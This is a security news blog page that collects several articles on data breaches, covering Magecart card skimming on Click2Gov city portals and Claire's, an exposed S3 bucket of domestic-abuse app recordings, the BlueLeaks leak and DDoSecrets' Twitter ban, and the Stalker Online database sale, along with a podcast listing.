Click2Govcredit carddata breachData lossMageCartMalware

What do they have in common? The Click2Gov online utility payment system

Websites of eight US cities poisoned by malware skimming the credit card details of residents

Websites of eight US cities poisoned by malware skimming the credit card details of residents

Beware if you’re paying your bills for local government services – the payment information you type into that web form may be heading straight to cybercriminals.

Security experts at Trend Micro report that they have identified eight cities in the USA where online payment portals have been compromised to host Magecart-style credit card skimming code.

Magecart is a family of Javascript malware used to steal credit card details and personal information from unsuspecting internet users as they interact with websites – often as sensitive details are entered to make a purchase.

What makes this type of attack often more serious than a conventional data breach, is that most companies do not store your full credit card details, such as your CVV security code. But those details are entered on online checkout forms by consumers, and can be stolen by a malicious script hidden in the website’s code.

As Trend Micro explains, the common factor between the affected websites they have uncovered is that they all use the third-party Click2Gov platform:

These sites all appear to have been built using Click2Gov, a web-based platform meant for use by local governments. It is used to provide services such as community engagement, issues reporting, and online payment for local goverments. Residents can use the platform to pay for city services, such as utilities.

According to the researchers, the attacks against the eight unnamed US cities started in April, when malicious Javascript code was planted on the websites, silently harvesting credit card details and residents’ personal information as they entered it into online payment forms.

Credit card skimming attack chain

Credit card skimming attack chain

Credit card skimming attack chain. Source: Trend Micro.

Unlike other skimmers which grab data on various types of payment forms, the skimmer used here is rather simple and only works on a Click2Gov payment form. No obfuscation or anti-debugging techniques were used. The skimmer hooks the submit event of the payment form; when a victim clicks the button to send the payment information, the skimmer will grab the information from the selected columns inside the payment form and immediately send the collected information to remote server via a HTTP POST request.

Details exfiltrated by the script to a remote server under the hackers’ control included credit card numbers, CVV security codes, card expiry dates, cardholder’s name, address, and postal code.

Simple the skimming code might be, but that doesn’t mean it’s not effective.

Email

Email

Sign up to our newsletterSign up to Graham Cluley’s newsletter – “GCHQ”
Security news, advice, and tips.

Rightly or wrongly, Click2Gov is earning itself a bad reputation. In recent years security researchers have been tracking attacks launched against the Click2Gov payment portal, with reports of breaches involving city websites stretching across the United States and Canada.

Late last year, for instance, the city of College Station admitted its Click2Gov online utility payment system had been hacked for some months, as had the City of Waco’s Click2Gov portal for water bill payments.

The onus is on cities to follow best practices when building and maintaining its online payment systems, ensuring that patches and security updates are applied in a timely fashion and that networks are properly secured.

Meanwhile, other websites with payment forms online would be wise to remember that credit-card skimming attacks are not limited to local governments taking payments from residents.

Magecart-style attacks have been seen hitting a diverse range of victims, including hotel chain booking websites, academic campuses, as well as the likes of Ticketmaster, British Airways, Forbes, Umbro, Vision Direct, and Newegg.

If you’re making online purchases (and hey, these days, who isn’t?) you might want to investigate disposable virtual payment cards, so you’re never exposing your real life credit card to the websites to which you are making a payment. A virtual card could be locked to a single merchant, have a limited amount that can be used in a single payment, or be single-use.

There is more discussion of virtual credit cards in this episode of the “Smashing Security” podcast:

Found this article interesting? Follow Graham Cluley on Twitter to read more of the exclusive content we post.

Follow me for more information.

AndroidAWSdata breachData lossdomestic abuseGuest blogiOS

One the face of it, it sounded like a good idea.

A smartphone app, disguised as a regular app delivering the top world, sports, and entertainment news, containing a secret feature that allows victims of domestic abuse to send a covert distress call for help at the touch of a button.

That was the idea behind the free Aspire News App, launched some years ago by When Georgia Smiled, a US non-profit founded by Robin McGraw and her husband US TV star “Dr Phil” to help victims of domestic violence and sexual assault.

To be honest, that still sounds like a good idea to me – if the app is coded well, and if any data it collects is properly secured.

But what isn’t a good idea is for voice recordings made by the app to be left exposed on an unsecured Amazon Web Services (AWS) S3 bucket, allowing anyone with internet access to download them and listen if they so wish.

According to security researchers at VPN Mentor, who found the exposed data, over 4,000 voice recordings of emergency messages left by victims of domestic violence were available to access – no password required.

Some of the 230MB worth of recordings included personally identifiable information such as names, home addresses, as well as the identities of violent abusers.

Transcripts of just two of the recordings that were exposed reveal the seriousness of the situation:

“[Full Name] is threatening or hurting me. Please send help now. [Full address]”

and

“Please call the police right away and have them come to [Full Address]. I am in great danger. I need you to send the police right away, please…”

Potentially, if the information fell into the wrong hands it could not only expose people who did not want the data revealed at the risk of extortion, but it could also put victims in greater physical danger if their abuser found out.

The researchers attempted to reach out to When Georgia Smiled and the Dr. Phil Foundation to get the serious data breach fixed last Wednesday, but ultimately it took the involvement of AWS itself to get the unsecured web bucket shut down.

So, that’s a happy end to the story, right?

Well, perhaps not.

You see, a security failure like this could lead to victims of domestic abuse losing confidence in Aspire News App. If they do not feel safe any longer using the app, they may find it harder to escape abusive relationships safely.

That clearly wasn’t what Dr Phil and his wife Robin McGraw wanted – the Aspire News app was supposed to help people escape dangerous situations, not make it even harder to find a way out.

Follow me for more information.

bitcoinBlueLeaksdata breachData lossDDoSecretsElon MuskPodcastPrivacySmashing SecurityYouTube

Industry veterans, chatting about computer security and online privacy.

Smashing Security podcast #184: Vanity Bitcoin wallets, BlueLeaks, and a Coronavirus app conspiracy

Smashing Security podcast #184: Vanity Bitcoin wallets, BlueLeaks, and a Coronavirus app conspiracy

A conspiracy spreads on social media about Coronavirus tracing apps, US police find decades’ worth of sensitive data leaked online, and is there a Bitcoin bonanza to be had from watching Elon Musk YouTube videos?

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by BBC technology reporter Zoe Kleinman.

Hosts:

Graham Cluley – @gcluley
Carole Theriault – @caroletheriault

Guest:

Zoe Kleinman – @zsk

Show notes:

Sponsor: LastPass

LastPass Enterprise makes password security effortless for your organization.

LastPass Enterprise simplifies password management for companies of every size, with the right tools to secure your business with centralized control of employee passwords and apps.

But, LastPass isn’t just for enterprises, it’s an equally great solution for business teams, families and single users.

Go to lastpass.com/smashing to see why LastPass is the trusted enterprise password manager of over 33 thousand businesses.

Sponsor: MetaCompliance

People are the key to minimizing your Cyber Security risk posture. Create a more security-conscious workforce with MetaCompliance’s Cyber Security Awareness for Dummies book. Download it for free at smashingsecurity.com/cyberaware now.

Follow the show:

Follow the show on Twitter at @SmashinSecurity, on the Smashing Security subreddit, or visit our website for more episodes.

Remember: Subscribe on Apple Podcasts, or your favourite podcast app, to catch all of the episodes as they go live. Thanks for listening!

Warning: This podcast may contain nuts, adult themes, and rude language.

Found this article interesting? Follow Graham Cluley on Twitter to read more of the exclusive content we post.

Follow me for more information.

data breachData lossGuest blogLaw & orderTwitter

The activist group Distributed Denial of Secrets, perhaps better known by their shorter but clumsy moniker DDoSecrets, has been permanently banned from Twitter.

The self-declared “transparency collective”, which published leaked and hacked data it claimed was of public interest, earned its banishment from Twitter after it distributed a gigantic collection of sensitive documents related to police and law enforcement across the United States.

As we previously reported, the 270GB data dump (dubbed “BlueLeaks”) contains many years worth of information from over 200 US police departments, FBI reports, and other law enforcement agencies.

As investigative journalist Brian Krebs reports, the data appears to have been exfiltrated following a security breach at web development firm Netsential.

The publication of the data appears to have been deliberately timed by DDoSecrets to coincide with “Juneteenth”, the United States’s national day of commemoration of the ending of slavery, June 19th.

Unfortunately, the group’s haste to release the data in time appears to have overtaken any desire to redact details which could put innocent parties at risk: such as images of suspects in police investigations, banking details, and other personally identifiable information (PII).

There are additionally concerns that the breach could endanger ongoing police investigations, and the lives of law enforcement officers.

And as the dumped data contains information reaching back as far as perhaps the mid-1990s, there is additionally the risk that information may be completely out-of-date.

Speaking to Wired, DDOSecrets founder Emma Best admitted that the group had probably failed to redact all information related to crime victims, children, and unrelated private businesses:

“Due to the size of the dataset, we probably missed things. I wish we could have done more, but I’m pleased with what we did and that we continue to learn.”

That’s a startling admission of failure. More clearly could have been done, but from the sound of things DDoSecrets and its supporters were working to too tight a deadline.

And clearly Twitter was not impressed to see the dissemination of the hacked data, which is in conflict with its policies.

Having been criticised in the past for its tardy response in banning other hacking groups, such as The Dark Overlord, DC Leaks, and Guccifer 2.0, Twitter clearly felt it couldn’t stand silent while the BlueLeaks data leak was being so overtly disseminated on its platform.

Such a ban, however, may not silence DDoSecrets permanently. Don’t be surprised if they pop up again, in a new guise, to share stolen secrets on Twitter.

Follow me for more information.

data breachData lossMMORPGStalker Onlinevideo game

Stalker Online hacked! Over one million gamers' details put on sale

Stalker Online hacked! Over one million gamers' details put on sale

More than one million players of the video game Stalker Online have been put at risk after hackers offered them for sale on the darknet.

As Cybernews reports, a database containing over 1.2 million Stalker Online user records is being sold on hacking forums. Separately, another database which is said to contain more than 136,000 records from the game’s forums are also being offered for sale.

Cybernews says it found the database for sale on a popular hacking forum on May 5, with a link to a defaced page on the Stalker Online website offered as “proof” that the game’s servers had been hacked.

Defaced webpage

Defaced webpage

Defaced Stalker Online webpage: Source: Cybernews.

The security of this web server has been compromised and all your files and userdata are now in our possession.

Contact us on [REDACTED] for assistance in securing your web server. If not reach within 24 hours – data gathered will be posted publicly for all to download

Of course, a defaced webpage is not evidence of a data breach. Controversially, Cybernews purchased the user database from the hacker, and says that it was able to confirm that the samples of the Stalker Online database “are genuine and the email addresses therein are deliverable.”

Purchasing stolen data from cybercriminals makes me extremely uncomfortable. It could be argued that anyone purchasing hacked databases – whether it by security researchers, journalist, or criminal fraudsters – are encouraging further hacks to occur by generating a demand for more stolen data.

The database, which is being offered for sale for “several hundred Euros worth of Bitcoins”, contains 1,289,084 Stalker Online player records, including usernames, account passwords, email addresses, phone numbers, and IP addresses.

Passwords are MD5 hashed and salted, which is certainly better than if they were held in plaintext, but such a weak algorithm may not present much of a challenge to criminals determined to crack them.

Cybernews says that it contacted the ecommerce platform that was hosting the hacker’s online store, and it has now been taken offline. However, that’s no guarantee that it will not be offered for sale elsewhere, or that anyone else might have purchased the database.

Email

Email

Sign up to our newsletter
Security news, advice, and tips.

So, players of the free-to-play MMORPG, set in a post-apocalyptic world, should really consider their details are now compromised. Hackers may have not only your username, email address, and phone number. They may also have cracked your password.

And if you made the mistake of reusing that password anywhere else on the internet, then there is a chance they could use that information to compromise your other online accounts.

Furthermore, you should obviously be aware that you might be targeted with phishing attacks, exploiting the information contained inside the database.

According to Cybernews, the makers of Stalker Online have not responded to messages related to the security reach.

Found this article interesting? Follow Graham Cluley on Twitter to read more of the exclusive content we post.

Follow me for more information.

Claire'sdata breachData lossGuest blogMageCartMalwareVulnerability

On March 20th, the Claire’s accessories retail chain beloved by young girls around the world made the sensible decision to close all of its physical stores in response to the Coronavirus Covid-19 pandemic.

Anyone wanting to purchase costume jewellery, make-up, or hair accessories would have to not take a trip to the shopping mall, but instead visit Claire’s online store instead.

A nuisance, for sure.  But also an opportunity if you were a malicious hacker.

As security researcher Willem de Groot of Sansec reports, within 24 hours of Claire’s bricks-and-mortar stores closing for business, someone had registered the domain claires-assets.com.

This domain was then used, the following month, to exfiltrate information entered on the checkout pages of Claire’s online store and its sister brand Icing.

Hackers managed to gain write-access to Claire’s website, and inject an otherwise legitimate piece of JavaScript used by the site with additional code which skimmed customer and full payment details from online purchasers as soon as they tried to “checkout.”

Attacks like this are, unfortunately, not uncommon.  Most notoriously, malicious code known as Magecart has been used to steal sensitive information from unsuspecting internet users.

What’s so dangerous about a Magecart attack is that it doesn’t matter if a company does not store all of your credit card payment details (such as your CVV security code). Nor does a Magecart attack have to break into a company’s database or crack sophisticated encryption to extract sensitive information.

Instead, Magecart’s malicious script can lurk on a company’s website watching the information as it is entered by customers into a payment form, and send it to the waiting hackers.

Companies whose customers have been impacted by past Magecart attacks include Ticketmaster, British Airways, Feedify, Umbro, Vision Direct, Newegg, Sweaty Betty, SHEIN, Nutribullet, the American Cancer Society… and many many more.

Often these attacks are orchestrated through “supply-chain” attacks, where the hackers poison a third-party script used by a website and therefore don’t need to breach the website’s own defences to steal from customers as they shop.

However, in the case of Claire’s it appears that the hackers did actually gain access to the online store’s infrastructure.

This raises some interesting questions.

Firstly, how did the hackers gain access to the website in order to plant their malicious code?  Did they exploit a vulnerability on the website, was a member of staff phished, or was this part of a wider exploitation of Claire’s infrastructure?

The next obvious follow-up question is what has Claire’s done to ensure that a similar breach doesn’t happen again?

In a statement the firm says that upon being notified by Sansec of the security breach, it removed the offending code.

“On Friday, we identified an issue related to our e-commerce platform and took immediate action to investigate and address it. Our investigation identified the unauthorized insertion of code to our e-commerce platform designed to obtain payment card data entered by customers during the checkout process. We removed that code and have taken additional measures to reinforce the security of our platform. We are working diligently to determine the transactions that were involved so that we can notify those individuals.”

It’s good to see action has been taken, and that customers will be notified, but what should not be ignored is that some online stores have been haunted by repeat infections.  Research produced by Willem de Groot, for instance, has warned in the past that 20% of Magecart-compromised merchants find their internet stores reinfected within days.

And finally, what is to be made of the four weeks or so between the registration of the domain claires-assets.com and the launch of the hackers’ web-skimming attack against customers or Claire’s.

All the evidence points to a determined effort by the hackers to find a weakness at Claire’s that could be exploited to plant the code.  It seems to me that criminals knew that with the closure of its shopping mall stores, there would be an increase in online purchases… and were hellbent on taking advantage of the retail lockdown to fill their pockets.

Some retailers in some countries are beginning to take tentative steps out of lockdown, opening their doors again to shoppers.  They would be wise not to continue to watch their websites carefully for web-skimming attacks like the one which hit Claire’s.

Follow me for more information.

Product categories

Post

July 2020
SMTWTFS
 1234
567891011
12131415161718
19202122232425
262728293031 
X